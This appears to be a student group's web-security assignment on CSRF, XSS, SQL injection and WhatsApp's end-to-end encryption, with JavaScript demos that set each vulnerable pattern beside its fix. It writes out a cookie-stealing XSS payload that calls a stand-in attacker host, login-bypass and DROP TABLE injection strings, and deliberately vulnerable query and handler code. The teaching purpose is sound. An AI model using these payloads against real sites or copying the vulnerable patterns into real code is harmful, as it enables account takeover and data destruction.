- What is a CSRF attack? How does it use HTTP requests? And why do we call it the one-click attack?
- What is an XSS attack? And what is the connection between it and cookies/sessions? And what are the two main categories of XSS?
- What is SQL injection? And what is the attacker's intention behind it?
- Consider the code below. Where is the vulnerability? Think about some ways an attacker could misuse it:
const { username, password } = req.body
// Deliberately vulnerable: the client-supplied values are interpolated straight into the SQL text
let strQry = `SELECT Count(*) FROM Users WHERE username='${username}' AND password='${password}'`;
- What does end-to-end encryption mean? Share an example of a well-known app that uses E2EE. How does that app use it?
1- CSRF stands for Cross-Site Request Forgery. HTTP is stateless, so a site identifies a logged-in user by a session cookie, and the browser automatically attaches that site's cookies to every request it sends to the site, no matter which page caused the request. An attacker therefore only has to make the victim's browser send an HTTP request to the target site (for example a form auto-submitted from the attacker's page, or an image tag whose src points at a state-changing URL); the browser adds the victim's cookies and the server treats the request as if the victim had made it. The attacker never needs to see the cookie, and HTTPS does not help, because the forged request is sent over the same encrypted connection. CSRF is called a "one-click attack" because it typically only requires the victim to click one link or visit one page containing the malicious code.
2- Cross-site scripting (XSS) lets an attacker inject malicious script into a trusted website so that it runs in other users' browsers. Because the injected script runs in the site's own origin, it can read the user's cookies through document.cookie (unless the cookie is marked HttpOnly) or grab a session token from the page and send it to the attacker, who can then take over that user's session and account. The two main categories are Reflected XSS, where the payload comes from the current request (for example a URL parameter echoed into the page) and Stored XSS, where the payload is saved on the server (for example in a comment) and served to every visitor. DOM-based XSS is often listed as a third category.
3- SQL injection is when user-controlled input, for example from a form field, is placed into a SQL query in a way that lets the attacker change the meaning of the query. The attacker's intention is, for example, to bypass authentication at sign-in, read data belonging to other users, or modify or delete data in the database. That is why input must be validated and, above all, kept separate from the SQL text.
4- The vulnerability is that data collected from the client (req.body) is interpolated directly into the SQL string without any validation or escaping, so the input becomes part of the SQL text instead of a value being compared. A username of admin' -- closes the string and comments out the password check; ' OR '1'='1 makes the WHERE condition always true; with a driver that allows stacked queries, '; DROP TABLE Users; -- deletes the table. The fix is to use the parameterized queries (prepared statements) offered by the database driver, so the values are sent separately from the query text; input validation is a secondary defence. Storing and comparing the password in plain text is a second problem: passwords should be stored as salted hashes.
5- End-to-end encryption (E2EE) is a method of secure communication in which a message is encrypted on the sender's device and can only be decrypted on the recipient's device, so no third party, including the service provider that relays the message, can read it in transit or on its servers. WhatsApp uses E2EE for personal messages and calls; its implementation is based on the Signal Protocol, where each device holds its own key pair and the WhatsApp servers only relay ciphertext they cannot decrypt.
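The CSRF mechanism from answer 1, as an added example that is not part of the original assignment: a small simulation in which the "browser" is a cookie jar that attaches the site's cookie to every request to that site regardless of which page triggered it, a vulnerable transfer handler that trusts the cookie alone, and a hardened handler that also checks a per-session synchronizer token and the Origin header. The bank and attacker hostnames, session id, token and balances are constructed for the example.

```javascript
// Added example (not from the original assignment). Simulates a browser's
// cookie handling to show why a forged cross-site request succeeds and how
// a CSRF token / Origin check stops it. All hosts and values are constructed.

const BANK = 'https://bank.example';
const ATTACKER = 'https://evil.example';

// Server-side session store: session id -> { user, csrfToken }.
const sessions = new Map([['sid-123', { user: 'alice', csrfToken: 'tok-9f8e' }]]);
const balances = { alice: 100, mallory: 0 };

// Browser cookie jar keyed by site. Alice is already logged in to the bank.
const cookieJar = new Map([[BANK, 'session=sid-123']]);

// The browser attaches the cookie for the target site no matter which
// page (origin) started the request. That single fact is what CSRF exploits.
function browserRequest(originPage, targetSite, body) {
  return { headers: { cookie: cookieJar.get(targetSite) || '', origin: originPage }, body };
}

function sessionFromRequest(req) {
  const m = /session=([^;]+)/.exec(req.headers.cookie);
  return m ? sessions.get(m[1]) : undefined;
}

function doTransfer(fromUser, to, amount) {
  balances[fromUser] -= amount;
  balances[to] = (balances[to] || 0) + amount;
}

// Vulnerable handler: the session cookie is the only proof of intent.
function transferVulnerable(req) {
  const session = sessionFromRequest(req);
  if (!session) return { ok: false, reason: 'not logged in' };
  doTransfer(session.user, req.body.to, req.body.amount);
  return { ok: true };
}

// Hardened handler: requires a token that only pages served by the bank can
// embed in the form, and rejects requests whose Origin is another site.
// Either check alone defeats this forgery; real apps commonly use both plus
// SameSite cookies.
function transferProtected(req) {
  const session = sessionFromRequest(req);
  if (!session) return { ok: false, reason: 'not logged in' };
  if (req.headers.origin && req.headers.origin !== BANK) {
    return { ok: false, reason: 'cross-site origin' };
  }
  if (req.body.csrfToken !== session.csrfToken) {
    return { ok: false, reason: 'missing or wrong CSRF token' };
  }
  doTransfer(session.user, req.body.to, req.body.amount);
  return { ok: true };
}

// Attacker page on evil.example auto-submits a form to the bank. It cannot
// read the bank's cookie or token, but the browser still attaches the cookie.
function forgedRequest() {
  return browserRequest(ATTACKER, BANK, { to: 'mallory', amount: 50 });
}

// A legitimate request: the bank's own page embedded the token in the form.
function legitimateRequest() {
  const token = sessions.get('sid-123').csrfToken;
  return browserRequest(BANK, BANK, { to: 'mallory', amount: 50, csrfToken: token });
}

function runDemo() {
  balances.alice = 100; balances.mallory = 0;
  const forgedVsVulnerable = transferVulnerable(forgedRequest());
  const aliceAfterVulnerable = balances.alice; // 50: the forgery worked

  balances.alice = 100; balances.mallory = 0;
  const forgedVsProtected = transferProtected(forgedRequest());
  const aliceAfterProtected = balances.alice; // 100: rejected

  const legitimateVsProtected = transferProtected(legitimateRequest());
  return { forgedVsVulnerable, aliceAfterVulnerable, forgedVsProtected,
           aliceAfterProtected, legitimateVsProtected };
}
```

Run with `node csrf.js` after adding `console.log(runDemo())`. The point to notice is that the attacker's page never reads the cookie; it only causes a request, and the browser supplies the credential.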
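The reflected XSS pattern from answer 2, as an added example that is not part of the original assignment: a page that echoes a search parameter straight into HTML next to the same page with output escaping. The payload and the attacker hostname are constructed for the example.

```javascript
// Added example (not from the original assignment). A reflected-XSS sink
// and its fix. The payload and evil.example host are constructed.

// Escapes the five characters that let text break out of an HTML text node
// or attribute value. Correct for HTML body/attribute context only;
// JavaScript, URL and CSS contexts need their own encoders.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the query parameter is reflected into the page unchanged, so
// markup in it becomes part of the DOM and scripts in it execute.
function renderSearchUnsafe(q) {
  return `<p>Results for: ${q}</p>`;
}

// Fixed: the parameter is rendered as text, never as markup.
function renderSearchSafe(q) {
  return `<p>Results for: ${escapeHtml(q)}</p>`;
}

// Constructed payload: ships the victim's non-HttpOnly cookies to the attacker.
const PAYLOAD = `<script>fetch('https://evil.example/?c=' + document.cookie)</script>`;

// True if the rendered HTML contains a live <script> tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}
```

Marking the session cookie HttpOnly keeps document.cookie from revealing it, but that only limits what the injected script can steal; escaping output (and a Content-Security-Policy) is what stops the script from running at all.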
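The login query from question 4 built two ways, as an added example that is not part of the original assignment: the interpolated version beside a parameterized version. No database is used; both functions only build the query so the effect of the input on the SQL text can be inspected. The $1/$2 placeholders and the { text, values } shape follow the node-postgres convention and are an assumption; other drivers use ? placeholders. The payloads are constructed.

```javascript
// Added example (not from the original assignment). Shows how interpolated
// input rewrites the SQL statement and how a parameterized query keeps the
// statement fixed. Placeholder style is assumed (node-postgres $1/$2).

// Vulnerable: the input is spliced into the SQL text and can change the
// structure of the statement, not just the values being compared.
function buildLoginQueryUnsafe(username, password) {
  return `SELECT Count(*) FROM Users WHERE username='${username}' AND password='${password}'`;
}

// Parameterized: the SQL text is fixed; the values travel separately and the
// database never parses them as SQL.
function buildLoginQuerySafe(username, password) {
  return {
    text: 'SELECT Count(*) FROM Users WHERE username=$1 AND password=$2',
    values: [username, password],
  };
}

// Constructed attacker inputs.
const PAYLOADS = {
  // Closes the string, adds an always-true condition, comments out the rest.
  bypassLogin: "admin' OR '1'='1' --",
  // Terminates the statement and appends a destructive one (works only with
  // a driver/database that executes stacked queries).
  dropTable: "x'; DROP TABLE Users; --",
};

// Naive view of what the database would see: drops a trailing "--" comment
// and splits on ';'. Ignores ';' inside quotes; illustration only.
function statementsIn(sql) {
  return sql
    .replace(/--.*$/, '')
    .split(';')
    .map((s) => s.trim())
    .filter(Boolean);
}
```

With the parameterized form, `PAYLOADS.dropTable` is just a username that happens to contain quotes and a semicolon; the server-side statement is the same single SELECT for every input. Separately from injection, the query compares a plain-text password column, which should be a salted hash verified in application code.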
Abdulrahman Khalil, Elaf Gardi, Dawood Alkawaz, Meer Atta, Vinos sarhad, AbdAlRahman Muayid